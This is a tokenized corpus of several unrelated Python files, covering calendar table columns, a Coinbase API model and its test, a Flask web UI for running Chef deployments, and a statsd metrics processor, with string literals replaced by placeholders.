<s> import calendar <EOL> from datetime import timedelta <EOL> from table . columns . base import Column <EOL> from table . columns . sequencecolumn import SequenceColumn <EOL> class DaysColumn ( SequenceColumn ) : <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> total_days = ( end_date - start_date ) . days + <NUM_LIT:1> <EOL> headers = [ ( start_date + timedelta ( day ) ) . strftime ( "<STR_LIT>" ) <EOL> for day in range ( total_days ) ] <EOL> super ( DaysColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> class WeeksColumn ( SequenceColumn ) : <EOL> WEEK_NAME = calendar . day_abbr <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> total_days = ( end_date - start_date ) . days + <NUM_LIT:1> <EOL> headers = [ self . WEEK_NAME [ ( start_date + timedelta ( day ) ) . weekday ( ) ] <EOL> for day in range ( total_days ) ] <EOL> super ( WeeksColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> class MonthsColumn ( SequenceColumn ) : <EOL> MONTH_NAME = calendar . month_name [ <NUM_LIT:1> : ] <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> delta_year = end_date . year - start_date . year <EOL> delta_month = end_date . month - start_date . month <EOL> total_months = delta_year * <NUM_LIT:12> + delta_month + <NUM_LIT:1> <EOL> headers = [ self . MONTH_NAME [ ( start_date . month + month - <NUM_LIT:1> ) % <NUM_LIT:12> ] <EOL> for month in range ( total_months ) ] <EOL> super ( MonthsColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> class InlineDaysColumn ( DaysColumn ) : <EOL> def __init__ ( self , field = None , start_date = None , end_date = None , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs . setdefault ( '<STR_LIT>' , { } ) <EOL> kwargs [ '<STR_LIT>' ] . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> super ( InlineDaysColumn , self ) . 
__init__ ( field , start_date , end_date , ** kwargs ) <EOL> class InlineWeeksColumn ( WeeksColumn ) : <EOL> def __init__ ( self , start_date = None , end_date = None , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs . setdefault ( '<STR_LIT>' , { } ) <EOL> kwargs [ '<STR_LIT>' ] . update ( { '<STR_LIT:class>' : '<STR_LIT>' } ) <EOL> super ( InlineWeeksColumn , self ) . __init__ ( start_date = start_date , end_date = end_date , ** kwargs ) <EOL> class InlineMonthsColumn ( MonthsColumn ) : <EOL> def __init__ ( self , start_date = None , end_date = None , ** kwargs ) : <EOL> self . start_date = start_date <EOL> self . end_date = end_date <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> kwargs [ '<STR_LIT>' ] = False <EOL> super ( InlineMonthsColumn , self ) . __init__ ( start_date = start_date , end_date = end_date , ** kwargs ) <EOL> def get_column ( self , key ) : <EOL> return Column ( field = self . get_field ( key ) , <EOL> header = self . get_header ( key ) , <EOL> header_attrs = self . get_column_header_attrs ( key ) , <EOL> ** self . kwargs ) <EOL> def get_column_header_attrs ( self , index ) : <EOL> header_attrs = self . kwargs . pop ( "<STR_LIT>" , { } ) <EOL> header_attrs . update ( { "<STR_LIT>" : self . get_column_span ( index ) } ) <EOL> return header_attrs <EOL> def get_column_span ( self , index ) : <EOL> """<STR_LIT>""" <EOL> return str ( self . get_days_span ( index ) ) <EOL> def get_days_span ( self , month_index ) : <EOL> """<STR_LIT>""" <EOL> is_first_month = month_index == <NUM_LIT:0> <EOL> is_last_month = month_index == self . __len__ ( ) - <NUM_LIT:1> <EOL> y = int ( self . start_date . year + ( self . start_date . month + month_index ) / <NUM_LIT> ) <EOL> m = int ( ( self . start_date . month + month_index ) % <NUM_LIT:12> or <NUM_LIT:12> ) <EOL> total = calendar . monthrange ( y , m ) [ <NUM_LIT:1> ] <EOL> if is_first_month and is_last_month : <EOL> return ( self . end_date - self . 
start_date ) . days + <NUM_LIT:1> <EOL> else : <EOL> if is_first_month : <EOL> return total - self . start_date . day + <NUM_LIT:1> <EOL> elif is_last_month : <EOL> return self . end_date . day <EOL> else : <EOL> return total <EOL> class CalendarColumn ( SequenceColumn ) : <EOL> MonthsColumnClass = InlineMonthsColumn <EOL> WeeksColumnClass = InlineWeeksColumn <EOL> DaysColumnClass = InlineDaysColumn <EOL> def __init__ ( self , field , start_date , end_date , ** kwargs ) : <EOL> self . months_column = self . MonthsColumnClass ( start_date , end_date , ** kwargs ) <EOL> self . weeks_column = self . WeeksColumnClass ( start_date , end_date , header_row_order = <NUM_LIT:1> ) <EOL> self . days_column = self . DaysColumnClass ( field , start_date , end_date , header_row_order = <NUM_LIT:2> ) <EOL> headers = self . months_column . headers + self . weeks_column . headers + self . days_column . headers <EOL> super ( CalendarColumn , self ) . __init__ ( field , headers , ** kwargs ) <EOL> @ property <EOL> def columns ( self ) : <EOL> return self . months_column . columns + self . weeks_column . columns + self . days_column . columns </s>
<s> from decimal import Decimal <EOL> from . util import namedtuple , optional <EOL> from . import CoinbaseAmount <EOL> class CoinbasePaymentButton ( namedtuple ( <EOL> '<STR_LIT>' , <EOL> optional = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def from_coinbase_dict ( cls , x ) : <EOL> kwargs = { <EOL> '<STR_LIT:id>' : x . get ( '<STR_LIT:code>' ) , <EOL> } <EOL> for key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> kwargs [ key ] = x . get ( key ) <EOL> if x . get ( '<STR_LIT>' ) : <EOL> prices = [ ] <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:6> ) : <EOL> s = x . get ( '<STR_LIT>' + str ( i ) ) <EOL> if s is not None : <EOL> prices . append ( Decimal ( s ) ) <EOL> kwargs [ '<STR_LIT>' ] = prices <EOL> kwargs [ '<STR_LIT>' ] = optional ( CoinbaseAmount . from_coinbase_dict ) ( <EOL> x . get ( '<STR_LIT>' ) ) <EOL> return CoinbasePaymentButton ( ** kwargs ) <EOL> def to_coinbase_dict ( self ) : <EOL> x = { } <EOL> if self . id is not None : <EOL> x [ '<STR_LIT:code>' ] = str ( self . id ) <EOL> for key in [ '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] : <EOL> value = getattr ( self , key ) <EOL> if value is not None : <EOL> x [ key ] = str ( value ) <EOL> for key in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> value = getattr ( self , key ) <EOL> if value is not None : <EOL> x [ key ] = bool ( value ) <EOL> if self . price is not None : <EOL> x [ '<STR_LIT>' ] = str ( self . price . amount ) <EOL> x [ '<STR_LIT>' ] = str ( self . price . currency ) <EOL> if self . 
suggested_prices is not None : <EOL> x [ '<STR_LIT>' ] = True <EOL> for i , price in zip ( range ( <NUM_LIT:1> , <NUM_LIT:6> ) , self . suggested_prices ) : <EOL> x [ '<STR_LIT>' . format ( i ) ] = str ( price ) <EOL> return x </s>
<s> from sure import this <EOL> from unittest import TestCase <EOL> from datetime import datetime <EOL> from dateutil . tz import tzoffset <EOL> from coinbase import CoinbaseAmount , CoinbaseContact , CoinbaseTransaction <EOL> from . import account_setup <EOL> from . http_mocking import * <EOL> @ with_http_mocking <EOL> class SendBtcToBitcoinTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> mock_http ( '<STR_LIT>' , <EOL> response_body ) <EOL> def test_send_btc_to_bitcoinaddress_with_key ( self ) : <EOL> account = account_setup . with_key ( ) <EOL> tx = account . send ( <EOL> to_address = '<STR_LIT>' , <EOL> amount = CoinbaseAmount ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idem = '<STR_LIT:abc>' , <EOL> ) <EOL> this ( last_request_json ( ) ) . should . equal ( expected_request_json ) <EOL> this ( last_request_params ( ) ) . should . equal ( { <EOL> '<STR_LIT>' : [ account_setup . api_key ] , <EOL> } ) <EOL> this ( tx ) . should . equal ( expected_transaction ) <EOL> def test_send_btc_to_bitcoin_address_with_oauth ( self ) : <EOL> account = account_setup . with_oauth ( ) <EOL> tx = account . send ( <EOL> to_address = '<STR_LIT>' , <EOL> amount = CoinbaseAmount ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idem = '<STR_LIT:abc>' , <EOL> ) <EOL> this ( last_request_json ( ) ) . should . equal ( expected_request_json ) <EOL> this ( last_request_params ( ) ) . should . equal ( { } ) <EOL> this ( tx ) . should . 
equal ( expected_transaction ) <EOL> expected_request_json = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:to>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' , <EOL> } <EOL> } <EOL> response_body = """<STR_LIT>""" <EOL> expected_transaction = CoinbaseTransaction ( <EOL> id = '<STR_LIT>' , <EOL> created_at = datetime ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT:15> , <NUM_LIT:1> , <NUM_LIT:11> , <EOL> tzinfo = tzoffset ( None , - <NUM_LIT> ) ) , <EOL> notes = '<STR_LIT>' , <EOL> idem = '<STR_LIT:abc>' , <EOL> amount = CoinbaseAmount ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> status = CoinbaseTransaction . Status . pending , <EOL> request = False , <EOL> sender = CoinbaseContact ( <EOL> id = '<STR_LIT>' , <EOL> email = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> recipient_address = '<STR_LIT>' , <EOL> recipient_type = '<STR_LIT>' , <EOL> ) </s>
<s> import gevent <EOL> import gevent . monkey <EOL> import gevent . socket <EOL> gevent . monkey . patch_all ( ) <EOL> import subprocess <EOL> import fcntl <EOL> import os <EOL> import errno <EOL> import sys <EOL> import urllib <EOL> import distutils . spawn <EOL> import gevent . queue <EOL> import gevent . event <EOL> import ujson <EOL> import flask <EOL> import flask . ext . login <EOL> import chef <EOL> import logging <EOL> app = flask . Flask ( '<STR_LIT>' ) <EOL> app . config . update ( <EOL> DEBUG = True , <EOL> SECRET_KEY = '<STR_LIT>' , <EOL> LOG_FILE = None , <EOL> LOG_FORMAT = '<STR_LIT>' , <EOL> LOG_LEVEL = logging . INFO , <EOL> ENABLE_BOOTSTRAP = True , <EOL> ) <EOL> BOOTSTRAP_ENV = '<STR_LIT>' <EOL> if distutils . spawn . find_executable ( '<STR_LIT>' ) : <EOL> bootstrap_enabled = True <EOL> else : <EOL> bootstrap_enabled = False <EOL> login_manager = flask . ext . login . LoginManager ( app ) <EOL> api = chef . autoconfigure ( ) <EOL> def handler ( environ , start_response ) : <EOL> handled = False <EOL> path = environ [ '<STR_LIT>' ] <EOL> if path . startswith ( '<STR_LIT>' ) : <EOL> ws = environ . get ( '<STR_LIT>' ) <EOL> if ws : <EOL> handle_websocket ( ws , path [ <NUM_LIT:6> : ] ) <EOL> handled = True <EOL> if not handled : <EOL> return app ( environ , start_response ) <EOL> websockets = { } <EOL> def handle_websocket ( ws , env ) : <EOL> if not env : <EOL> env = BOOTSTRAP_ENV <EOL> s = websockets . get ( env ) <EOL> if s is None : <EOL> s = websockets [ env ] = [ ] <EOL> s . append ( ws ) <EOL> while True : <EOL> buf = ws . receive ( ) <EOL> if buf is None : <EOL> break <EOL> if ws in s : <EOL> s . remove ( ws ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ flask . ext . login . login_required <EOL> def feed ( env = None ) : <EOL> flask . abort ( <NUM_LIT> ) <EOL> greenlets = { } <EOL> def processes ( env = None , node = None , only_executing = True ) : <EOL> env_greenlets = greenlets . 
get ( env ) <EOL> if env_greenlets is None : <EOL> return [ ] <EOL> elif node is None : <EOL> result = [ ] <EOL> for greenlet in env_greenlets . itervalues ( ) : <EOL> if not only_executing or not greenlet . ready ( ) : <EOL> result . append ( greenlet ) <EOL> return result <EOL> else : <EOL> greenlet = env_greenlets . get ( node ) <EOL> if greenlet is None or ( only_executing and greenlet . ready ( ) ) : <EOL> return [ ] <EOL> else : <EOL> return [ greenlet , ] <EOL> def broadcast ( env , packet ) : <EOL> sockets = websockets . get ( env ) <EOL> if sockets is not None : <EOL> packet = ujson . encode ( packet ) <EOL> for ws in list ( sockets ) : <EOL> if ws . socket is not None : <EOL> try : <EOL> ws . send ( packet ) <EOL> except gevent . socket . error : <EOL> if ws in sockets : <EOL> sockets . remove ( ws ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ flask . ext . login . login_required <EOL> def converge ( env , node = None ) : <EOL> if env == BOOTSTRAP_ENV : <EOL> flask . abort ( <NUM_LIT> ) <EOL> if len ( processes ( env , node , only_executing = True ) ) > <NUM_LIT:0> : <EOL> return ujson . encode ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> if node is not None : <EOL> nodes = { node : chef . Node ( node , api = api ) , } <EOL> else : <EOL> nodes = { row . object . name : row . object for row in chef . Search ( '<STR_LIT>' , '<STR_LIT>' + env , api = api ) } <EOL> get_command = lambda n : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , n [ '<STR_LIT>' ] , '<STR_LIT>' , '<STR_LIT>' ] <EOL> return _run ( <EOL> nodes , <EOL> get_command , <EOL> env = env , <EOL> progress_status = '<STR_LIT>' , <EOL> ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ flask . ext . login . login_required <EOL> def bootstrap_list ( ) : <EOL> if not bootstrap_enabled or not app . config . get ( '<STR_LIT>' ) : <EOL> flask . abort ( <NUM_LIT> ) <EOL> nodes = greenlets . 
get ( BOOTSTRAP_ENV , { } ) . keys ( ) <EOL> status , output , executing = get_env_status ( BOOTSTRAP_ENV , nodes , progress_status = '<STR_LIT>' ) <EOL> return flask . render_template ( <EOL> '<STR_LIT>' , <EOL> status = status , <EOL> output = output , <EOL> nodes = nodes , <EOL> ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> @ flask . ext . login . login_required <EOL> def bootstrap ( ip ) : <EOL> if not bootstrap_enabled or not app . config . get ( '<STR_LIT>' ) : <EOL> flask . abort ( <NUM_LIT> ) <EOL> if len ( processes ( BOOTSTRAP_ENV , ip , only_executing = True ) ) > <NUM_LIT:0> : <EOL> return ujson . encode ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> if len ( chef . Search ( '<STR_LIT>' , '<STR_LIT>' % ( ip , ip , ip ) , api = api ) ) > <NUM_LIT:0> : <EOL> broadcast ( BOOTSTRAP_ENV , { '<STR_LIT:host>' : ip , '<STR_LIT:status>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT>' } ) <EOL> return ujson . encode ( { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> get_command = lambda ip : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ip ] <EOL> return _run ( <EOL> { ip : ip , } , <EOL> get_command , <EOL> env = BOOTSTRAP_ENV , <EOL> progress_status = '<STR_LIT>' , <EOL> ) <EOL> def _run ( nodes , get_command , env , progress_status ) : <EOL> env_greenlets = greenlets . get ( env ) <EOL> if env_greenlets is None : <EOL> greenlets [ env ] = env_greenlets = { } <EOL> for node in nodes : <EOL> try : <EOL> del env_greenlets [ node ] <EOL> except KeyError : <EOL> pass <EOL> for hostname in nodes : <EOL> node_object = nodes [ hostname ] <EOL> p = subprocess . Popen ( get_command ( node_object ) , shell = False , stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> p . chunks = [ ] <EOL> fcntl . fcntl ( p . stdout , fcntl . F_SETFL , os . 
O_NONBLOCK ) <EOL> def read ( host , process ) : <EOL> broadcast ( env , { '<STR_LIT:host>' : host , '<STR_LIT:status>' : progress_status } ) <EOL> while True : <EOL> chunk = None <EOL> try : <EOL> chunk = process . stdout . read ( <NUM_LIT> ) <EOL> if not chunk : <EOL> break <EOL> except IOError , e : <EOL> chunk = None <EOL> if e [ <NUM_LIT:0> ] != errno . EAGAIN : <EOL> raise <EOL> sys . exc_clear ( ) <EOL> if chunk : <EOL> process . chunks . append ( chunk ) <EOL> broadcast ( env , { '<STR_LIT:host>' : host , '<STR_LIT:data>' : chunk , } ) <EOL> gevent . socket . wait_read ( process . stdout . fileno ( ) ) <EOL> process . stdout . close ( ) <EOL> process . wait ( ) <EOL> errors = process . stderr . read ( ) <EOL> process . chunks . append ( errors ) <EOL> broadcast ( env , { '<STR_LIT:host>' : host , '<STR_LIT:status>' : '<STR_LIT>' if process . returncode == <NUM_LIT:0> else '<STR_LIT:error>' , '<STR_LIT:data>' : errors } ) <EOL> if len ( processes ( env , only_executing = True ) ) <= <NUM_LIT:1> : <EOL> broadcast ( env , { '<STR_LIT:status>' : '<STR_LIT>' } ) <EOL> return process . returncode <EOL> greenlet = gevent . spawn ( read , host = hostname , process = p ) <EOL> greenlet . process = p <EOL> env_greenlets [ hostname ] = greenlet <EOL> broadcast ( env , { '<STR_LIT:status>' : progress_status } ) <EOL> return ujson . encode ( { '<STR_LIT:status>' : progress_status if len ( nodes ) > <NUM_LIT:0> else '<STR_LIT>' } ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> @ flask . ext . login . login_required <EOL> def index ( ) : <EOL> envs = chef . Environment . list ( api = api ) <EOL> return flask . render_template ( <EOL> '<STR_LIT>' , <EOL> envs = envs . itervalues ( ) , <EOL> bootstrap_enabled = bootstrap_enabled and app . config . get ( '<STR_LIT>' ) , <EOL> ) <EOL> def get_env_status ( env , nodes , progress_status ) : <EOL> status = { } <EOL> output = { } <EOL> executing = False <EOL> env_greenlets = greenlets . 
get ( env ) <EOL> if env_greenlets is None : <EOL> env_greenlets = greenlets [ env ] = { } <EOL> for node in nodes : <EOL> greenlet = env_greenlets . get ( node ) <EOL> if greenlet is None : <EOL> status [ node ] = '<STR_LIT>' <EOL> output [ node ] = '<STR_LIT>' <EOL> else : <EOL> s = progress_status <EOL> if greenlet . ready ( ) : <EOL> s = '<STR_LIT>' if greenlet . value == <NUM_LIT:0> else '<STR_LIT:error>' <EOL> else : <EOL> executing = True <EOL> status [ node ] = s <EOL> output [ node ] = '<STR_LIT>' . join ( greenlet . process . chunks ) <EOL> return status , output , executing <EOL> @ app . route ( '<STR_LIT>' ) <EOL> @ flask . ext . login . login_required <EOL> def env ( env ) : <EOL> if env == BOOTSTRAP_ENV : <EOL> flask . abort ( <NUM_LIT> ) <EOL> if len ( chef . Search ( '<STR_LIT>' , '<STR_LIT>' + env , api = api ) ) == <NUM_LIT:0> : <EOL> flask . abort ( <NUM_LIT> ) <EOL> nodes = list ( chef . Search ( '<STR_LIT>' , '<STR_LIT>' % env , api = api ) ) <EOL> nodes . sort ( key = lambda n : n . object . name ) <EOL> status , output , converging = get_env_status ( env , ( n . object . name for n in nodes ) , progress_status = '<STR_LIT>' ) <EOL> return flask . render_template ( <EOL> '<STR_LIT>' , <EOL> env = env , <EOL> converging = converging , <EOL> status = status , <EOL> output = output , <EOL> nodes = nodes , <EOL> ) <EOL> @ login_manager . user_loader <EOL> class User ( object ) : <EOL> def __init__ ( self , id ) : <EOL> self . id = id <EOL> def is_authenticated ( self ) : <EOL> return True <EOL> def is_active ( self ) : <EOL> return True <EOL> def is_anonymous ( self ) : <EOL> return False <EOL> def get_id ( self ) : <EOL> return self . id <EOL> login_manager . login_view = '<STR_LIT>' <EOL> @ app . template_filter ( '<STR_LIT>' ) <EOL> def urlquote ( url ) : <EOL> return urllib . quote ( url , '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def login ( ) : <EOL> request = flask . 
request <EOL> if flask . ext . login . current_user . is_authenticated ( ) : <EOL> return flask . redirect ( request . args . get ( '<STR_LIT>' ) or flask . url_for ( '<STR_LIT:index>' ) ) <EOL> username = request . form . get ( '<STR_LIT:username>' ) <EOL> remember = request . form . get ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> if username is not None : <EOL> password = request . form . get ( '<STR_LIT:password>' ) <EOL> auth_result = ujson . decode ( api . request ( '<STR_LIT:POST>' , '<STR_LIT>' , data = ujson . encode ( { '<STR_LIT:name>' : username , '<STR_LIT:password>' : password } ) ) ) <EOL> if auth_result . get ( '<STR_LIT:name>' ) == username and auth_result . get ( '<STR_LIT>' ) : <EOL> flask . ext . login . login_user ( User ( username ) , remember = remember ) <EOL> return flask . redirect ( request . args . get ( '<STR_LIT>' ) or flask . url_for ( '<STR_LIT:index>' ) ) <EOL> else : <EOL> return flask . render_template ( '<STR_LIT>' , <EOL> username = username , <EOL> error = True , <EOL> remember = remember , <EOL> next = request . args . get ( '<STR_LIT>' ) , <EOL> ) <EOL> return flask . render_template ( '<STR_LIT>' , <EOL> username = None , <EOL> error = False , <EOL> remember = remember , <EOL> next = request . args . get ( '<STR_LIT>' ) , <EOL> ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def logout ( ) : <EOL> flask . ext . login . logout_user ( ) <EOL> return flask . redirect ( flask . url_for ( '<STR_LIT>' ) ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def favicon ( ) : <EOL> return flask . send_from_directory ( <EOL> os . path . join ( app . root_path , '<STR_LIT>' ) , <EOL> '<STR_LIT>' , <EOL> mimetype = '<STR_LIT>' , <EOL> ) </s>
<s> from collections import deque <EOL> import re <EOL> import time <EOL> import logging <EOL> from twisted . python import log <EOL> from txstatsd . metrics . metermetric import MeterMetricReporter <EOL> SPACES = re . compile ( "<STR_LIT>" ) <EOL> SLASHES = re . compile ( "<STR_LIT>" ) <EOL> NON_ALNUM = re . compile ( "<STR_LIT>" ) <EOL> RATE = re . compile ( "<STR_LIT>" ) <EOL> def normalize_key ( key ) : <EOL> """<STR_LIT>""" <EOL> key = SPACES . sub ( "<STR_LIT:_>" , key ) <EOL> key = SLASHES . sub ( "<STR_LIT:->" , key ) <EOL> key = NON_ALNUM . sub ( "<STR_LIT>" , key ) <EOL> return key <EOL> class BaseMessageProcessor ( object ) : <EOL> def process ( self , message ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if not "<STR_LIT::>" in message : <EOL> return self . fail ( message ) <EOL> key , data = message . strip ( ) . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> if not "<STR_LIT:|>" in data : <EOL> return self . fail ( message ) <EOL> fields = data . split ( "<STR_LIT:|>" ) <EOL> if len ( fields ) < <NUM_LIT:2> or len ( fields ) > <NUM_LIT:3> : <EOL> return self . fail ( message ) <EOL> key = normalize_key ( key ) <EOL> metric_type = fields [ <NUM_LIT:1> ] <EOL> return self . process_message ( message , metric_type , key , fields ) <EOL> def rebuild_message ( self , metric_type , key , fields ) : <EOL> return key + "<STR_LIT::>" + "<STR_LIT:|>" . join ( fields ) <EOL> def fail ( self , message ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( "<STR_LIT>" % message , logLevel = logging . DEBUG ) <EOL> class MessageProcessor ( BaseMessageProcessor ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , time_function = time . time , plugins = None ) : <EOL> self . time_function = time_function <EOL> self . stats_prefix = "<STR_LIT>" <EOL> self . internal_metrics_prefix = "<STR_LIT>" <EOL> self . count_prefix = "<STR_LIT>" <EOL> self . timer_prefix = self . stats_prefix + "<STR_LIT>" <EOL> self . gauge_prefix = self . stats_prefix + "<STR_LIT>" <EOL> self . 
process_timings = { } <EOL> self . by_type = { } <EOL> self . last_flush_duration = <NUM_LIT:0> <EOL> self . last_process_duration = <NUM_LIT:0> <EOL> self . timer_metrics = { } <EOL> self . counter_metrics = { } <EOL> self . gauge_metrics = deque ( ) <EOL> self . meter_metrics = { } <EOL> self . plugins = { } <EOL> self . plugin_metrics = { } <EOL> if plugins is not None : <EOL> for plugin in plugins : <EOL> self . plugins [ plugin . metric_type ] = plugin <EOL> def get_metric_names ( self ) : <EOL> """<STR_LIT>""" <EOL> metrics = set ( ) <EOL> metrics . update ( self . timer_metrics . keys ( ) ) <EOL> metrics . update ( self . counter_metrics . keys ( ) ) <EOL> metrics . update ( v for k , v in self . gauge_metrics ) <EOL> metrics . update ( self . meter_metrics . keys ( ) ) <EOL> metrics . update ( self . plugin_metrics . keys ( ) ) <EOL> return list ( metrics ) <EOL> def process_message ( self , message , metric_type , key , fields ) : <EOL> """<STR_LIT>""" <EOL> start = self . time_function ( ) <EOL> if metric_type == "<STR_LIT:c>" : <EOL> self . process_counter_metric ( key , fields , message ) <EOL> elif metric_type == "<STR_LIT>" : <EOL> self . process_timer_metric ( key , fields [ <NUM_LIT:0> ] , message ) <EOL> elif metric_type == "<STR_LIT:g>" : <EOL> self . process_gauge_metric ( key , fields [ <NUM_LIT:0> ] , message ) <EOL> elif metric_type == "<STR_LIT:m>" : <EOL> self . process_meter_metric ( key , fields [ <NUM_LIT:0> ] , message ) <EOL> elif metric_type in self . plugins : <EOL> self . process_plugin_metric ( metric_type , key , fields , message ) <EOL> else : <EOL> return self . fail ( message ) <EOL> self . process_timings . setdefault ( metric_type , <NUM_LIT:0> ) <EOL> self . process_timings [ metric_type ] += self . time_function ( ) - start <EOL> self . by_type . setdefault ( metric_type , <NUM_LIT:0> ) <EOL> self . 
by_type [ metric_type ] += <NUM_LIT:1> <EOL> def get_message_prefix ( self , kind ) : <EOL> return "<STR_LIT>" + kind <EOL> def process_plugin_metric ( self , metric_type , key , items , message ) : <EOL> if not key in self . plugin_metrics : <EOL> factory = self . plugins [ metric_type ] <EOL> metric = factory . build_metric ( <EOL> self . get_message_prefix ( factory . name ) , <EOL> name = key , wall_time_func = self . time_function ) <EOL> self . plugin_metrics [ key ] = metric <EOL> self . plugin_metrics [ key ] . process ( items ) <EOL> def process_timer_metric ( self , key , duration , message ) : <EOL> try : <EOL> duration = float ( duration ) <EOL> except ( TypeError , ValueError ) : <EOL> return self . fail ( message ) <EOL> self . compose_timer_metric ( key , duration ) <EOL> def compose_timer_metric ( self , key , duration ) : <EOL> if key not in self . timer_metrics : <EOL> self . timer_metrics [ key ] = [ ] <EOL> self . timer_metrics [ key ] . append ( duration ) <EOL> def process_counter_metric ( self , key , composite , message ) : <EOL> try : <EOL> value = float ( composite [ <NUM_LIT:0> ] ) <EOL> except ( TypeError , ValueError ) : <EOL> return self . fail ( message ) <EOL> rate = <NUM_LIT:1> <EOL> if len ( composite ) == <NUM_LIT:3> : <EOL> match = RATE . match ( composite [ <NUM_LIT:2> ] ) <EOL> if match is None : <EOL> return self . fail ( message ) <EOL> rate = match . group ( <NUM_LIT:1> ) <EOL> self . compose_counter_metric ( key , value , rate ) <EOL> def compose_counter_metric ( self , key , value , rate ) : <EOL> if key not in self . counter_metrics : <EOL> self . counter_metrics [ key ] = <NUM_LIT:0> <EOL> self . counter_metrics [ key ] += value * ( <NUM_LIT:1> / float ( rate ) ) <EOL> def process_gauge_metric ( self , key , composite , message ) : <EOL> values = composite . split ( "<STR_LIT::>" ) <EOL> if not len ( values ) == <NUM_LIT:1> : <EOL> return self . 
fail ( message ) <EOL> try : <EOL> value = float ( values [ <NUM_LIT:0> ] ) <EOL> except ( TypeError , ValueError ) : <EOL> self . fail ( message ) <EOL> self . compose_gauge_metric ( key , value ) <EOL> def compose_gauge_metric ( self , key , value ) : <EOL> metric = [ value , key ] <EOL> self . gauge_metrics . append ( metric ) <EOL> def process_meter_metric ( self , key , composite , message ) : <EOL> values = composite . split ( "<STR_LIT::>" ) <EOL> if not len ( values ) == <NUM_LIT:1> : <EOL> return self . fail ( message ) <EOL> try : <EOL> value = float ( values [ <NUM_LIT:0> ] ) <EOL> except ( TypeError , ValueError ) : <EOL> self . fail ( message ) <EOL> self . compose_meter_metric ( key , value ) <EOL> def compose_meter_metric ( self , key , value ) : <EOL> if not key in self . meter_metrics : <EOL> metric = MeterMetricReporter ( key , self . time_function , <EOL> prefix = "<STR_LIT>" ) <EOL> self . meter_metrics [ key ] = metric <EOL> self . meter_metrics [ key ] . mark ( value ) <EOL> def flush ( self , interval = <NUM_LIT> , percent = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> per_metric = { } <EOL> num_stats = <NUM_LIT:0> <EOL> interval = interval / <NUM_LIT:1000> <EOL> timestamp = int ( self . time_function ( ) ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_counter_metrics ( interval , timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> start = self . time_function ( ) <EOL> events = <NUM_LIT:0> <EOL> for metrics in self . flush_timer_metrics ( percent , timestamp ) : <EOL> for metric in metrics : <EOL> yield metric <EOL> events += <NUM_LIT:1> <EOL> duration = self . time_function ( ) - start <EOL> num_stats += events <EOL> per_metric [ "<STR_LIT>" ] = ( events , duration ) <EOL> 